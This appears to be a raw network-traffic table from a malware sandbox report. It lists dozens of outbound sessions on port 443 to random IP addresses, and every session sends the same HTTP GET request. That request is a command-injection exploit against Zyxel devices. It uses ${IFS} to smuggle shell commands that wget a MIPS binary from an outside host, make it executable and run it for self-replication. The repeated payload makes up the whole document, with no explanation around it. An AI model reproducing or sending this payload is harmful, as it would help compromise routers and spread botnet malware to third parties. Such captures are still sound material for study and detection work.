                                                      3734192.168.2.1460154202.104.164.194443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.578903913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3735192.168.2.1437272138.39.69.128443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.578958035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3736192.168.2.1447334178.7.152.8443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.578994989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3737192.168.2.1433806112.176.31.182443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.579018116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3738192.168.2.143366624.191.192.225443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.579051971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3739192.168.2.1460738111.6.113.249443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.579096079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3740192.168.2.145407064.248.10.95443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.579118967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3741192.168.2.1437112136.127.129.155443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.579164982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3742192.168.2.1441900134.27.233.29443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.579214096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3743192.168.2.144837266.100.216.22443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.579256058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3744192.168.2.1458716189.172.89.103443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.579272032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3745192.168.2.1440108112.75.159.45443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.579319954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3746192.168.2.1446280181.212.61.171443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.579375029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3747192.168.2.145379870.233.36.29443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.579410076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3748192.168.2.1441032178.222.169.234443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.579431057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3749192.168.2.1456674157.69.98.246443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.579488039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3750192.168.2.144094872.193.112.105443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.579529047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3751192.168.2.144673470.126.231.233443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.579581022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3752192.168.2.144640240.43.86.194443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.579607964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3753192.168.2.1437602160.160.16.162443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.579678059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3754192.168.2.1434048172.85.90.206443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.579736948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3755192.168.2.1452606125.1.124.151443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.579767942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3756192.168.2.144086037.181.55.141443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.579813957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3757192.168.2.144647420.22.135.171443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.579838991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3758192.168.2.145101690.187.56.255443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.579880953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3759192.168.2.1443918147.71.9.111443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.579905033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3760192.168.2.145140863.27.97.116443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.579958916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3761192.168.2.1442442174.88.171.193443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.579984903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3762192.168.2.1455472207.126.53.47443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.580014944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3763192.168.2.14441645.120.162.144443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.580081940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3764192.168.2.1447154178.138.218.29443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.580121040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3765192.168.2.1444786163.228.150.196443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.580162048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3766192.168.2.1459804156.167.157.126443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.580176115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3767192.168.2.1434826189.174.67.191443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.580225945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3768192.168.2.1438294103.1.86.245443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.580281973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3769192.168.2.1437204200.102.85.109443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.580317020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3770192.168.2.145134088.15.229.100443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.580357075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3771192.168.2.1439976104.39.74.224443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.580403090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3772192.168.2.1451728219.86.81.121443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.580420971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3773192.168.2.145017854.248.143.40443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.580471992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3774192.168.2.1448784196.168.249.108443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.580488920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3775192.168.2.1456440190.22.173.57443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.580538988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3776192.168.2.143893017.11.15.155443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.580573082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3777192.168.2.1459646140.149.9.220443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.580636978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3778192.168.2.1438426111.70.70.44443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.580662966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3779192.168.2.144276464.141.26.129443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.580712080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3780192.168.2.1452758116.52.185.133443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.580738068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3781192.168.2.144593459.189.117.177443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.580811024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3782192.168.2.1446178108.67.125.136443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.580852985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3783192.168.2.1438452103.169.146.71443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.580909967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3784192.168.2.144757666.10.101.74443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.580949068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3785192.168.2.145900486.10.44.197443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.580981016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3786192.168.2.1442652218.106.254.61443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.581017017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3787192.168.2.1444324101.241.21.168443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.581048965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3788192.168.2.1452446220.77.13.108443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.581091881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3789192.168.2.1444172153.26.161.136443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.581120014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3790192.168.2.144469071.91.230.116443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.581166983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3791192.168.2.1448076173.8.60.141443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.581207037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3792192.168.2.145387047.163.250.189443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.581238031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3793192.168.2.144988854.147.205.25443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.581278086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3794192.168.2.1443672209.5.85.40443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.581331015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3795192.168.2.1453006159.7.144.200443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.581357956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3796192.168.2.1449224118.168.194.5443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.581398010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3797192.168.2.1459984122.242.152.123443
